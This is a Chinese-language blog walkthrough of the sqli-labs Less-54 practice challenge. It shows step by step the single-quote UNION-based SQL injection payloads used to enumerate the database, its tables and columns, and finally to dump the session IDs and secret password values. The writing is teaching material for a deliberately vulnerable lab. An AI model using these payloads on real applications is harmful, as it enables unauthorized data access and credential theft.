• sqli-labs/Less-54


    这一关的欢迎界面提示我们可以进行10次尝试注入 但是10次以后就会重置各种信息其中就包括数据库、表格、字段等等 其次提示我们以id作为注入点

    首先判断是否属于数字型注入 输入如下

    id=1 and 1=2

    回显如下 这个回显印证了两件事情 一个是该注入类型不属于数字一个是能够使用联合注入的方法 

    接着尝试输入一下1' 回显如下 没有正确回显 大概率是这个类型 但是也没有报错 我们不能从报错信息中获取到有用的东西 因此后续操作也就不能使用报错注入

    那么只能够通过正确回显来判定自己的想法是否正确 这时需要借助注释符的力量 输入如下

    id=1'--+

    正确回显了 说明就是单引号注入类型

    接着我们通过联合注入进行各种爆破操作

    首先进行一下爆回显点操作 输入如下

    id=0' union select 1,2,3--+

    回显如下

    接着进行爆数据库和版本号的操作 输入如下

    id=0' union select 1,database(),version()--+

     回显如下

    然后进行报表操作 输入如下

    id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

    回显如下

    接着进行爆字段操作 输入如下

    id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qnmd3l5c75'--+

     回显如下

    最后进行爆id和sessid操作 输入如下

    id=0' union select 1,2,group_concat(id,'-',sessid) from qnmd3l5c75--+

    回显如下

    在进行爆secret_V092和tryy字段的操作 输入如下

    id=0' union select 1,2,group_concat(secret_V092,'-',tryy) from qnmd3l5c75--+

     回显如下

    从最后爆字段的操作中我们可以知道sessid为用户名 secret_xxxx为密码 id就是纯粹的id tryy就是当前尝试次数 接下来的关卡就会用到了

    通关成功 嗨嗨!! 

  • 相关阅读:
    C++ using的多种用法
    【C++ Primer Plus学习记录】指针——指针和字符串
    【题解】同济线代习题一.6.5
    Container is running beyond memory limits
    一位工作七年的Java工程师给毕业生的经验分享
    计算机网络重点概念整理-第四章 网络层【期末复习|考研复习】
    【RCNN系列】Faster RCNN
    Perl 语言入门教程
    介绍下我的知识星球
    未来视角:多云运维的新趋势与展望
  • 原文地址:https://blog.csdn.net/m0_71299382/article/details/128019554